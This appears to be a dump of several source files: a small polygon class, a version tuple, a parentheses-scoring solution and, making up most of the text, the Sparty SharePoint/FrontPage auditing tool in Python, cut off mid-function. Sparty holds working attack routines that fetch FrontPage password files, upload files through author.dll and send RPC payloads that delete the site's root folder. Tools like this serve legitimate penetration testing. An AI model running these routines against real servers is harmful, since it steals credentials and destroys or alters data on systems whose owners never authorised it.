content stringlengths 5 1.05M |
|---|
#! /usr/bin/env python
# coding=utf-8
#
# Copyright © 2017 Gael Lederrey <gael.lederrey@epfl.ch>
#
# Distributed under terms of the MIT license.
#
# Based on the code of Ulf Astrom (http://www.happyponyland.net)
from camogen.helpers import *
class Polygon:
    """
    A surface described by an ordered list of vertices.
    (The last vertex connects back to the first one.)
    """

    def __init__(self, color_index=None):
        """
        Constructor with the color index.

        :param color_index: Index of the color
        """
        self.color_index = color_index
        self.list_vertices = []
        self.list_neighbours = []

    def circumference(self):
        """
        Compute the circumference of the polygon by summing the
        distances between consecutive vertices (wrapping around).

        :return: value for the circumference
        """
        nbr = len(self.list_vertices)
        return sum(
            dist_vertices(self.list_vertices[i],
                          self.list_vertices[(i + 1) % nbr])
            for i in range(nbr))

    def add_vertex(self, v):
        """
        Append a single vertex to the polygon.

        :param v: Vertex
        :raises ValueError: if ``v`` is not an instance of class ``Vertex``
        """
        if type(v).__name__ != 'Vertex':
            raise ValueError("Element should be of the class Vertex")
        self.list_vertices.append(v)

    def add_vertices(self, vs):
        """
        Append several vertices at once.

        :param vs: List of vertices
        :raises ValueError: if any element is not an instance of ``Vertex``
        """
        if any(type(v).__name__ != 'Vertex' for v in vs):
            raise ValueError("Element should be of the class Vertex")
        self.list_vertices.extend(vs)

    def add_neighbour(self, idx):
        """
        Record the index of a neighbouring polygon.

        :param idx: Index of a polygon
        """
        self.list_neighbours.append(idx)

    def to_string(self):
        """
        Build a printable representation. For debug purposes.

        :return: String of the polygon
        """
        inner = ", ".join(v.to_string() for v in self.list_vertices)
        return "Polygon: {" + inner + "}"
|
# Package version tuple: (major, minor, patch).
VERSION = (0, 2, 0)
|
class Solution:
    def scoreOfParentheses(self, S: str) -> int:
        """Return the score of a balanced parentheses string.

        Scoring rules: "()" scores 1, "AB" scores A + B, "(A)" scores
        2 * A.  A stack holds '(' markers and partial scores: on ')',
        either the matching '(' is on top (an empty pair, worth 1) or
        the scores accumulated inside the pair are summed and doubled.

        Fix over the original: the unused local ``score`` was removed.

        :param S: a balanced string containing only '(' and ')'
        :return: the total score
        """
        stack = []
        for ch in S:
            if ch == '(':
                stack.append('(')
            elif stack[-1] == '(':
                # Empty "()" pair: replace the marker with a score of 1.
                stack.pop()
                stack.append(1)
            else:
                # Sum everything enclosed by this pair, then double it.
                inner = 0
                while stack[-1] != '(':
                    inner += stack.pop()
                stack.pop()
                stack.append(inner * 2)
        return sum(stack)
|
#!/usr/bin/env python2
# coding: utf-8
# Original code: Aditya K Sood - SecNiche Security Labs (c) 2013
# Updated/Bugfixes by: Glenn 'devalias' Grant - http://devalias.net/
# Refactorisation by: Borja R - https://www.libcrack.so/
import os
import re
import sys
import logging
import urllib2
import httplib
import requests
import optparse
from ntlm import HTTPNtlmAuthHandler
# Module-wide logger; DEBUG level so every probe result is printed.
logname = "sparty"
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(logname)
# Frontend (bin) repository files
# Default FrontPage executables, RPC endpoints and stray logs probed
# under the target root by the '-f bin' module.
front_bin = [
    '_vti_inf.html',
    '_vti_bin/shtml.dll/_vti_rpc',
    '_vti_bin/owssvr.dll',
    '_vti_bin/_vti_adm/admin.dll',
    '_vti_bin/_vti_adm/admin.exe',
    '_vti_bin/_vti_aut/author.exe',
    '_vti_bin/_vti_aut/WS_FTP.log',
    '_vti_bin/_vti_aut/ws_ftp.log',
    '_vti_bin/shtml.exe/_vti_rpc',
    '_vti_bin/_vti_aut/author.dll']
# SharePoint/FrontPage web-service (.asmx) endpoints probed by '-i'.
front_services = [
    '_vti_bin/Admin.asmx',
    '_vti_bin/alerts.asmx',
    '_vti_bin/dspsts.asmx',
    '_vti_bin/forms.asmx',
    '_vti_bin/Lists.asmx',
    '_vti_bin/people.asmx',
    '_vti_bin/Permissions.asmx',
    '_vti_bin/search.asmx',
    '_vti_bin/UserGroup.asmx',
    '_vti_bin/versions.asmx',
    '_vti_bin/Views.asmx',
    '_vti_bin/webpartpages.asmx',
    '_vti_bin/webs.asmx',
    '_vti_bin/spsdisco.aspx',
    '_vti_bin/AreaService.asmx',
    '_vti_bin/BusinessDataCatalog.asmx',
    '_vti_bin/ExcelService.asmx',
    '_vti_bin/SharepointEmailWS.asmx',
    '_vti_bin/spscrawl.asmx',
    '_vti_bin/spsearch.asmx',
    '_vti_bin/UserProfileService.asmx',
    '_vti_bin/WebPartPages.asmx']
# Frontend (pvt) repository files
# Sensitive FrontPage metadata/password files probed by '-f pvt'.
# NOTE: both WS_FTP.log casings above and the files here are kept as-is
# on purpose -- remote servers may be case-sensitive.
front_pvt = [
    '_vti_pvt/authors.pwd',
    '_vti_pvt/administrators.pwd',
    '_vti_pvt/users.pwd',
    '_vti_pvt/service.pwd',
    '_vti_pvt/service.grp',
    '_vti_pvt/bots.cnf',
    '_vti_pvt/service.cnf',
    '_vti_pvt/access.cnf',
    '_vti_pvt/writeto.cnf',
    '_vti_pvt/botsinf.cnf',
    '_vti_pvt/doctodep.btr',
    '_vti_pvt/deptodoc.btr',
    '_vti_pvt/linkinfo.cnf',
    '_vti_pvt/services.org',
    '_vti_pvt/structure.cnf',
    '_vti_pvt/svcacl.cnf',
    '_vti_pvt/uniqperm.cnf',
    '_vti_pvt/service/lck',
    '_vti_pvt/frontpg.lck']
# Sharepoint and Frontend (directory) repository
# Directories whose listing/permissions are audited by '-l'.
directory_check = [
    '_vti_pvt/',
    '_vti_bin/',
    '_vti_log/',
    '_vti_cnf/',
    '_vti_bot',
    '_vti_bin/_vti_adm',
    '_vti_bin/_vti_aut',
    '_vti_txt/']
# Sharepoint '_layouts/' administration pages probed by '-s layouts'.
# Mixed '_layouts'/'_Layouts' casings are deliberate (remote servers may
# be case-sensitive).  Fix over the original: the duplicated
# '_layouts/ManageFeatures.aspx' entry was removed so the page is only
# requested once per scan.
sharepoint_check_layout = [
    '_layouts/aclinv.aspx',
    '_layouts/addrole.aspx',
    '_layouts/AdminRecycleBin.aspx',
    '_layouts/AreaNavigationSettings.aspx',
    '_Layouts/AreaTemplateSettings.aspx',
    '_Layouts/AreaWelcomePage.aspx',
    '_layouts/associatedgroups.aspx',
    '_layouts/bpcf.aspx',
    '_Layouts/ChangeSiteMasterPage.aspx',
    '_layouts/create.aspx',
    '_layouts/editgrp.aspx',
    '_layouts/editprms.aspx',
    '_layouts/groups.aspx',
    '_layouts/help.aspx',
    '_layouts/images/',
    '_layouts/listedit.aspx',
    '_layouts/ManageFeatures.aspx',
    '_layouts/mcontent.aspx',
    '_layouts/mngctype.aspx',
    '_layouts/mngfield.aspx',
    '_layouts/mngsiteadmin.aspx',
    '_layouts/mngsubwebs.aspx',
    '_layouts/mngsubwebs.aspx?view=sites',
    '_layouts/mobile/mbllists.aspx',
    '_layouts/MyInfo.aspx',
    '_layouts/MyPage.aspx',
    '_layouts/MyTasks.aspx',
    '_layouts/navoptions.aspx',
    '_layouts/NewDwp.aspx',
    '_layouts/newgrp.aspx',
    '_layouts/newsbweb.aspx',
    '_layouts/PageSettings.aspx',
    '_layouts/people.aspx',
    '_layouts/people.aspx?MembershipGroupId=0',
    '_layouts/permsetup.aspx',
    '_layouts/picker.aspx',
    '_layouts/policy.aspx',
    '_layouts/policyconfig.aspx',
    '_layouts/policycts.aspx',
    '_layouts/Policylist.aspx',
    '_layouts/prjsetng.aspx',
    '_layouts/quiklnch.aspx',
    '_layouts/recyclebin.aspx',
    '_Layouts/RedirectPage.aspx',
    '_layouts/role.aspx',
    '_layouts/settings.aspx',
    '_layouts/SiteDirectorySettings.aspx',
    '_layouts/sitemanager.aspx',
    '_layouts/SiteManager.aspx?lro=all',
    '_layouts/spcf.aspx',
    '_layouts/storman.aspx',
    '_layouts/themeweb.aspx',
    '_layouts/topnav.aspx',
    '_layouts/user.aspx',
    '_layouts/userdisp.aspx',
    '_layouts/userdisp.aspx?ID=1',
    '_layouts/useredit.aspx',
    '_layouts/useredit.aspx?ID=1',
    '_layouts/viewgrouppermissions.aspx',
    '_layouts/viewlsts.aspx',
    '_layouts/vsubwebs.aspx',
    '_layouts/WPPrevw.aspx?ID=247',
    '_layouts/wrkmng.aspx']
# Sharepoint list/library form pages probed by '-s forms'.
sharepoint_check_forms = [
    'Forms/DispForm.aspx',
    'Forms/DispForm.aspx?ID=1',
    'Forms/EditForm.aspx',
    'Forms/EditForm.aspx?ID=1',
    'Forms/Forms/AllItems.aspx',
    'Forms/MyItems.aspx',
    'Forms/NewForm.aspx',
    'Pages/default.aspx',
    'Pages/Forms/AllItems.aspx']
# Sharepoint galleries (master pages / web parts / templates) for '-s catalog'.
sharepoint_check_catalog = [
    '_catalogs/masterpage/Forms/AllItems.aspx',
    '_catalogs/wp/Forms/AllItems.aspx',
    '_catalogs/wt/Forms/Common.aspx']
# FrontPage password files tried by the credential-dumping module ('-d').
password_files = [
    '_vti_pvt/service.pwd',
    '_vti_pvt/administrators.pwd',
    '_vti_pvt/authors.pwd']
# Accumulator lists filled in place by build_target() for each scan mode.
refine_target = []
pvt_target = []
dir_target = []
sharepoint_target_layout = []
sharepoint_target_forms = []
sharepoint_target_catalog = []
def check_python():
    """
    Abort with exit code 1 when running under Python 3.

    This tool is Python 2 only (urllib2, httplib, raw_input); the
    original docstring wrongly said it "checks for python v3" without
    mentioning the abort.  The convoluted ``version[:2][0]`` lookup is
    replaced by the direct major-version check.
    """
    if sys.version_info[0] == 3:
        logger.error("Python3 not supported")
        sys.exit(1)
def banner():
    """Print the sparty ASCII-art banner together with the credits."""
    print("\t---------------------------------------------------------------")
    art = """
_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
_| _| _| _| _| _| _| _| _| _|
_|_| _|_|_| _|_|_|_| _|_|_| _| _|
_| _| _| _| _| _| _| _|
_|_|_| _| _| _| _| _| _| _|
SPARTY : Sharepoint/Frontpage Security Auditing Tool
Authored by: Aditya K Sood | {0kn0ck}@secniche.org | @AdityaKSood | 2013
Updated by: Borja R | borja@libcrack.so | @borjiviri | 2015
Powered by: SecNiche Security Labs | 2013
Backed by: Pentest Limited | 2015
"""
    print(art)
    print("\t--------------------------------------------------------------")
def usage(destination):
    """
    Print invocation examples for the most common scan modes.

    :param destination: example target URL shown in the sample commands
    """
    prog = sys.argv[0]
    print("[scanning access permissions in forms directory - sharepoint] %s -s forms -u %s " % (prog, destination))
    print("[scanning access permissions in frontpage directory - frontpage] %s -f pvt -u %s " % (prog, destination))
    print("[dumping passwords] %s -d dump -u %s " % (prog, destination))
    print("[note] : please take this into consideration")
    print("\t\t: (1) always specify https | http explicitly")
    print("\t\t: (2) always provide the proper directory structure where sharepoint/frontpage is installed")
    print("\t\t: (3) do not specify '/' at the end of url")
def build_target(target, front_dirs=None, refine_target=None):
    """
    Append "<target>/<item>" onto *refine_target* for every relative
    path in *front_dirs*.

    Fix over the original: both list parameters were mutable default
    arguments, so calls relying on the defaults shared (and kept
    growing) the very same list objects across invocations.

    :param target: base URL of the target
    :param front_dirs: relative paths to join onto the base URL
    :param refine_target: output list extended in place
    """
    if front_dirs is None:
        front_dirs = []
    if refine_target is None:
        refine_target = []
    for item in front_dirs:
        refine_target.append(target + "/" + item)
def success(module_name):
    """
    Log the HTTP status-code legend followed by a completion notice
    for *module_name*.
    """
    legend = "\n[+] check for HTTP codes (200) for active list of accessible files or directories (404) - Not exists | (403) - Forbidden (500) - Server Error"
    logger.info(legend)
    logger.info("\n[+] (%s) - module executed successfully\n" % module_name)
def target_information(url):
    """
    Fetch the target URL once and report its HTTP status code and
    Server header.

    Fix over the original: the handler caught ``urllib2.HTTPError``,
    but ``requests.get`` raises ``requests.exceptions.RequestException``
    subclasses (and those carry no ``.code``), so connection failures
    crashed instead of being logged.

    :param url: base URL of the target (including http/https scheme)
    """
    logger.info(
        "[+] fetching information from the given target : (%s)" %
        (url))
    try:
        r = requests.get(url)
        logger.info(
            "[+] target responded with HTTP code: (%s)" %
            r.status_code)
        logger.info("[+] target is running server: (%s)" % r.headers["server"])
    except requests.exceptions.RequestException as h:
        logger.info("[-] url error occured - (%s)" % h)
def audit(target=None):
    """
    Request every URL in *target* and log its HTTP status code.

    Fixes over the original: the mutable default argument is replaced
    with ``None``, and the unused local ``info = handle.info()`` was
    removed.

    :param target: list of fully-built URLs to probe
    """
    for element in (target or []):
        try:
            handle = urllib2.urlopen(element)
            response_code = handle.getcode()
            logger.info("[+] (%s) - (%d)" % (element, response_code))
        except urllib2.HTTPError as h:
            logger.info("[-] (%s) - (%d)" % (element, h.code))
        except httplib.BadStatusLine:
            logger.info("[-] server responds with bad status")
def dump_credentials(dest):
    """
    Dump frontpage service and administrators password files if present.

    Fixes over the original:
    * the response body was read twice -- the second ``handle.read()``
      always returned '' so nothing was ever echoed to the log;
    * the dump file handle was never closed (now a ``with`` block);
    * ``filename`` could be unbound in the final log line when no file
      was successfully retrieved (now initialised up front).

    :param dest: base URL of the target
    """
    filename = "__dump__.txt"
    password_targets = [dest + "/" + item for item in password_files]
    for entry in password_targets:
        try:
            handle = urllib2.urlopen(entry)
            if handle.getcode() == 200:
                logger.info(
                    "[+] dumping contents of file located at : (%s)" %
                    (entry))
                contents = handle.read()
                with open(filename, 'a') as dump:
                    dump.write(contents)
                logger.info(contents)
        except urllib2.HTTPError as h:
            logger.info(
                "[-] could not dump the file located at : (%s) | (%d)" %
                (entry, h.code))
            continue
        except httplib.BadStatusLine:
            logger.info("[-] server responds with bad status")
            continue
    logger.info(
        "[*] ---------------------------------------------------------------------------------------")
    logger.info("[+] check the (%s) file if generated\n" % (filename))
def fingerprint_frontpage(name):
    """
    Fingerprint frontpage version using default files

    Probes the default FrontPage binaries to tell a unix install from a
    Windows one, then reads the 'FPVersion=' marker out of
    _vti_inf.html for the exact version string.

    :param name: base URL of the target
    """
    # Default FrontPage executables that only ship on unix installs...
    enum_nix = [
        '_vti_bin/_vti_aut/author.exe',
        '_vti_bin/_vti_adm/admin.exe',
        '_vti_bin/shtml.exe']
    # ...and their Windows (DLL) counterparts.
    enum_win = [
        '_vti_bin/_vti_aut/author.dll',
        '_vti_bin/_vti_aut/dvwssr.dll',
        '_vti_bin/_vti_adm/admin.dll',
        '_vti_bin/shtml.dll']
    build_enum_nix = []
    build_enum_win = []
    for item in enum_nix:
        build_enum_nix.append(name + "/" + item)
    for entry in build_enum_nix:
        try:
            info = urllib2.urlopen(entry)
            if info.getcode() == 200:
                logger.info(
                    "[+] front page is tested as : nix version | (%s) | (%d)" %
                    (entry, info.getcode()))
        except urllib2.HTTPError:
            # A 403/404 simply means this default file is absent; keep probing.
            pass
    for item in enum_win:
        build_enum_win.append(name + "/" + item)
    for entry in build_enum_win:
        try:
            info = urllib2.urlopen(entry)
            if info.getcode() == 200:
                logger.info(
                    "[+] front page is tested as : windows version | (%s) | (%d)" %
                    (entry, info.getcode()))
        except urllib2.HTTPError:
            logger.info(
                "[-] failed to extract the version of frontpage from default file!")
            pass
        except httplib.BadStatusLine:
            logger.info("[-] server responds with bad status")
            pass
    # _vti_inf.html embeds an "FPVersion=" marker with the exact version.
    frontend_version = name + "/_vti_inf.html"
    try:
        version = urllib2.urlopen(frontend_version)
        logger.info(
            "[+] extracting frontpage version from default file : (%s):" %
            re.findall(
                r'FPVersion=(.*)',
                version.read()))
    except urllib2.HTTPError:
        logger.error(
            "[-] failed to extract the version of frontpage from default file")
        pass
    except httplib.BadStatusLine:
        logger.error("[-] server responds with bad status")
        pass
    logger.info(
        "[*] ---------------------------------------------------------------------------------------")
# dump sharepoint headers for version fingerprinting
def dump_sharepoint_headers(name):
    """
    dump sharepoint headers for version fingerprint

    Inspects three diagnostic response headers:
    MicrosoftSharepointTeamServices (version), X-SharepointHealthScore
    (load balancing) and SPRequestGuid (diagnostics).

    Fix over the original: the third check logged ``dump_f`` (the
    load-balancing response) instead of ``dump_g`` (the diagnostics
    response just fetched).

    :param name: base URL of the target
    """
    try:
        dump_s = urllib2.urlopen(name)
        logger.info(
            "[+] configured sharepoint version is : (%s)" %
            dump_s.info()['microsoftsharepointteamservices'])
    except KeyError:
        logger.error(
            "[-] sharepoint version could not be extracted using HTTP header : MicrosoftSharepointTeamServices")
    try:
        dump_f = urllib2.urlopen(name)
        logger.info(
            "[+] sharepoint is configured with load balancing capability : (%s)" %
            dump_f.info()['x-sharepointhealthscore'])
    except KeyError:
        logger.error(
            "[-] sharepoint load balancing ability could not be determined using HTTP header : X-SharepointHealthScore")
    try:
        dump_g = urllib2.urlopen(name)
        logger.info(
            "[+] sharepoint is configured with explicit diagnosis (GUID based log analysis) purposes : (%s)" %
            dump_g.info()['sprequestguid'])
    except KeyError:
        logger.error(
            "[-] sharepoint diagnostics ability could not be determined using HTTP header : SPRequestGuid")
    except urllib2.HTTPError:
        pass
    except httplib.BadStatusLine:
        logger.error("[-] server responds with bad status")
# file uploading routine to upload file remotely on frontpage extensions
def frontpage_rpc_check(name):
    """
    Probe the FrontPage RPC endpoints: first a GET to verify the
    endpoint is listening, then a POST asking for the server version
    (successful responses are appended to an HTML file for review).

    :param name: base URL of the target
    """
    # Headers mimicking the Microsoft FrontPage client.
    headers = {
        'MIME-Version': '4.0',
        'User-Agent': 'MSFrontPage/4.0',
        'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'Keep-Alive'}
    exp_target_list = [
        '_vti_bin/shtml.exe/_vti_rpc',
        '_vti_bin/shtml.dll/_vti_rpc']
    data = "method= server version"
    # data="method=list+services:4.0.2.0000&service_name="
    # for item in exploit_targets:
    for item in exp_target_list:
        destination = name + "/" + item
        logger.info(
            "[+] Sending HTTP GET request to - (%s) for verifying whether RPC is listening" %
            destination)
        try:
            req = urllib2.Request(destination)
            response = urllib2.urlopen(req)
            if response.getcode() == 200:
                logger.info(
                    "[+] target is listening on frontpage RPC - (%s)\n" %
                    response.getcode())
            else:
                logger.info(
                    "[-] target is not listening on frontpage RPC - (%s)\n" %
                    response.getcode())
        except urllib2.URLError as e:
            logger.error("[-] url error, code: %s" % e.code)
            pass
        except httplib.BadStatusLine as h:
            logger.error("[-] server responds with bad status")
            pass
        # Second phase: POST the version-query payload to the same endpoint.
        logger.info(
            "[+] Sending HTTP POST request to retrieve software version - (%s)" %
            destination)
        try:
            req = urllib2.Request(destination, data, headers)
            response = urllib2.urlopen(req)
            if response.getcode() == 200:
                logger.info(
                    "[+] target accepts the request - (%s) | (%s)\n" %
                    (data, response.getcode()))
                filename = "__version__.txt" + ".html"
                version = open(filename, 'a')
                version.write(response.read())
                logger.info("[+] check file for contents - (%s) \n" % filename)
            else:
                logger.info(
                    "[-] target fails to accept request - (%s) | (%s)\n" %
                    (data, response.getcode()))
        except urllib2.URLError as e:
            logger.error(
                "[-] url error, seems like authentication is required or server failed to handle request - %s" %
                e.code)
            pass
        except httplib.BadStatusLine:
            logger.error("[-] server responds with bad status")
            pass
    logger.info(
        "[*] ---------------------------------------------------------------------------------------")
def frontpage_service_listing(name):
    """
    Query the FrontPage RPC endpoints for a service listing with a set
    of version-specific payloads; successful responses are appended to
    a per-payload HTML file for offline inspection.

    Fixes over the original: the failure log interpolated the whole
    ``data`` payload list instead of the current ``entry``, and the
    output file handle was never closed.

    :param name: base URL of the target
    """
    # Headers mimicking the Microsoft FrontPage client.
    headers = {
        'MIME-Version': '4.0',
        'User-Agent': 'MSFrontPage/4.0',
        'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'Keep-Alive'}
    service_target_list = [
        '_vti_bin/shtml.exe/_vti_rpc',
        '_vti_bin/shtml.dll/_vti_rpc']
    # One "list services" payload per known FrontPage version.
    data = [
        'method=list+services:3.0.2.1076&service_name=',
        'method=list+services:4.0.2.471&service_name=',
        'method=list+services:4.0.2.0000&service_name=',
        'method=list+services:5.0.2.4803&service_name=',
        'method=list+services:5.0.2.2623&service_name=',
        'method=list+services:6.0.2.5420&service_name=']
    for item in service_target_list:
        destination = name + "/" + item
        logger.info(
            "[+] Sending HTTP POST request to retrieve service listing - (%s)" %
            destination)
        try:
            for entry in data:
                req = urllib2.Request(destination, entry, headers)
                response = urllib2.urlopen(req)
                if response.getcode() == 200:
                    logger.info(
                        "[+] target accepts the request - (%s) | (%s)" %
                        (entry, response.getcode()))
                    filename = "__service-list__.txt" + entry + ".html"
                    with open(filename, 'a') as service_list:
                        service_list.write(response.read())
                    logger.info("[+] check file for contents - (%s) \n" % filename)
                else:
                    logger.info(
                        "[-] target fails to accept request - (%s) | (%s)\n" %
                        (entry, response.getcode()))
        except urllib2.URLError as e:
            logger.error(
                "[-] url error, seems like authentication is required or server failed to handle request - %s" %
                e.code)
        except httplib.BadStatusLine:
            logger.error("[-] server responds with bad status")
    logger.info(
        "[*] ---------------------------------------------------------------------------------------")
def frontpage_config_check(name):
    """
    POST version-specific FrontPage RPC payloads to author.dll to open
    the service, list documents and fetch a default document; positive
    responses are appended to an HTML report file.

    :param name: base URL of the target
    """
    # Headers mimicking the Microsoft FrontPage client.
    headers = {
        'MIME-Version': '4.0',
        'User-Agent': 'MSFrontPage/4.0',
        'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'Keep-Alive'}
    # running some standard commands to retrieve files and configuration checks
    # frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803, 5.0.2.2623 , 6.0.2.5420
    # version : major ver=n.minor ver=n.phase ver=n.verincr=v
    front_exp_target = '_vti_bin/_vti_aut/author.dll'
    payloads = [
        'method=open service:3.0.2.1706&service_name=/',
        'method=list documents:3.0.2.1706&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
        'method=getdocument:3.0.2.1105&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
        'method=open service:4.0.2.4715&service_name=/',
        'method=list documents:4.0.2.4715&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
        'method=getdocument:4.0.2.4715&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
        'method=open service:5.0.2.4803&service_name=/',
        'method=list documents:5.0.2.4803&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
        'method=getdocument:5.0.2.4803&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
        'method=open service:5.0.2.2623&service_name=/',
        'method=list documents:5.0.2.2623&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
        'method=getdocument:5.0.2.2623&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
        'method=open service:6.0.2.5420&service_name=/',
        'method=list documents:6.0.2.5420&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
        'method=getdocument:6.0.2.5420&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=']
    for item in payloads:
        destination = name + "/" + front_exp_target
        logger.info(
            "[+] Sending HTTP POST request to [open service | listing documents] - (%s)" %
            destination)
        try:
            req = urllib2.Request(destination, item, headers)
            response = urllib2.urlopen(req)
            if response.getcode() == 200:
                logger.info(
                    "[+] target accepts the request - (%s) | (%s)\n" %
                    (item, response.getcode()))
                filename = "__author-dll-config__.txt" + ".html"
                service_list = open(filename, 'a')
                service_list.write(response.read())
                logger.info("[+] check file for contents - (%s) \n" % filename)
            else:
                logger.info(
                    "[-] target fails to accept request - (%s) | (%s)\n" %
                    (item, response.getcode()))
        except urllib2.URLError as e:
            logger.error(
                "[-] url error, seems like authentication is required or server failed to handle request - %s \n[-] payload [%s]\n" %
                (e.code, item))
            pass
        except httplib.BadStatusLine:
            logger.error("[-] server responds with bad status")
            pass
def frontpage_remove_folder(name):
    """
    Remove specific folder from the web server

    POSTs version-specific "remove documents" RPC payloads against
    author.dll, targeting the '/' folder, and echoes the server's
    response lines on success.

    :param name: base URL of the target
    """
    # Headers mimicking the Microsoft FrontPage client.
    headers = {
        'MIME-Version': '4.0',
        'User-Agent': 'MSFrontPage/4.0',
        'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'Keep-Alive'}
    # running some standard commands to remove "/" folder from the web server using author.dll
    # frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803,
    # 5.0.2.2623 , 6.0.2.5420
    file_exp_target = '_vti_bin/_vti_aut/author.dll'
    payloads = [
        'method=remove+documents:3.0.2.1786&service_name=/',
        'method=remove+documents:4.0.2.4715&service_name=/',
        'method=remove+documents:5.0.3.4803&service_name=/',
        'method=remove+documents:5.0.2.4803&service_name=/',
        'method=remove+documents:6.0.2.5420&service_name=/']
    for item in payloads:
        destination = name + "/" + file_exp_target
        logger.info(
            "[+] Sending HTTP POST request to remove '/' directory to - (%s)" %
            destination)
        try:
            req = urllib2.Request(destination, item, headers)
            response = urllib2.urlopen(req)
            if response.getcode() == 200:
                logger.info(
                    "[+] folder removed successfully - (%s) | (%s)\n" %
                    (item, response.getcode()))
                # Echo the server's RPC response body for the operator.
                for line in response.readlines():
                    logger.info(line)
            else:
                logger.error(
                    "[-] fails to remove '/' folder at - (%s) | (%s)\n" %
                    (item, response.getcode()))
        except urllib2.URLError as e:
            logger.error(
                "[-] url error, seems like authentication is required or server failed to handle request - %s \n[-] payload [%s]\n" %
                (e.code, item))
            pass
        except httplib.BadStatusLine:
            logger.error("[-] server responds with bad status")
            pass
# file uploading through author.dll
def file_upload_check(name):
    """
    Try to upload a marker file (sparty.txt) through author.dll using
    version-specific FrontPage RPC "put document" payloads; the
    server's response lines are echoed on success.

    Fix over the original: the local marker file was created with
    ``os.system("echo 'Sparty Testing' > sparty.txt")`` -- a needless,
    non-portable shell invocation.  A plain file write produces the
    same contents without touching the shell.

    :param name: base URL of the target
    """
    # Headers mimicking the Microsoft FrontPage client.
    headers = {
        'MIME-Version': '4.0',
        'User-Agent': 'MSFrontPage/4.0',
        'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'Keep-Alive'}
    # running some standard commands to upload file to web server using author.dll
    # frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803,
    # 5.0.2.2623 , 6.0.2.5420
    with open("sparty.txt", "w") as marker:
        marker.write("Sparty Testing\n")
    file_exp_target = '_vti_bin/_vti_aut/author.dll'
    payloads = [
        'method=put document:3.0.2.1706&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
        'method=put document:4.0.2.4715&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
        'method=put document:5.0.2.2623&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
        'method=put document:5.0.2.4823&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
        'method=put document:6.0.2.5420&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false']
    for item in payloads:
        destination = name + "/" + file_exp_target
        logger.info(
            "[+] Sending HTTP POST request for uploading file to - (%s)" %
            destination)
        try:
            req = urllib2.Request(destination, item, headers)
            response = urllib2.urlopen(req)
            if response.getcode() == 200:
                logger.info(
                    "[+] file uploaded successfully - (%s) | (%s)\n" %
                    (item, response.getcode()))
                for line in response.readlines():
                    logger.info(line)
            else:
                logger.error(
                    "[-] file fails to upload at - (%s) | (%s)\n" %
                    (item, response.getcode()))
        except urllib2.URLError as e:
            logger.error(
                "[-] url error, seems like authentication is required or server failed to handle request - %s \n[-] payload [%s]\n" %
                (e.code, item))
        except httplib.BadStatusLine:
            logger.error("[-] server responds with bad status")
def enable_ntlm_authentication(user="", password="", url=""):
    """
    NTLM Authentication routine (implemented by devalias.net)

    Installs a global urllib2 opener that answers NTLM, digest and
    basic auth challenges for the given URL's scheme+host.  Prompts
    interactively for any credential left empty.  Python 2 only
    (``raw_input`` and the py2 ``urlparse`` module).

    :param user: DOMAIN\\username; prompted for when empty
    :param password: password; prompted for when empty
    :param url: target URL whose scheme and host form the auth realm
    """
    logger.info("[+][devalias.net] Enabling NTLM authentication support")
    try:
        from urlparse import urlparse, urlunparse
    except ImportError:
        logger.error(
            "[-][devalias.net][NTLM Authentication] Program could not find module : urlparse")
        sys.exit(2)
    if user == "":
        user = raw_input("[+][devalias.net][NTLM Authentication] Enter username (DOMAIN\username): ")
    if password == "":
        password = raw_input(
            "[+][devalias.net][NTLM Authentication] Enter password: ")
    parsed_url = urlparse(url)
    # Keep only scheme://host so the credentials apply to the whole site.
    base_uri = urlunparse((parsed_url[0], parsed_url[1], "", "", "", ""))
    passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
    passman.add_password(None, base_uri, user, password)
    # create the NTLM authentication handler
    auth_NTLM = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passman)
    # other authentication handlers
    auth_basic = urllib2.HTTPBasicAuthHandler(passman)
    auth_digest = urllib2.HTTPDigestAuthHandler(passman)
    # disable proxies (if you want to stay within the corporate network)
    # proxy_handler = urllib2.ProxyHandler({})
    proxy_handler = urllib2.ProxyHandler()
    # create and install the opener
    opener = urllib2.build_opener(
        proxy_handler,
        auth_NTLM,
        auth_digest,
        auth_basic)
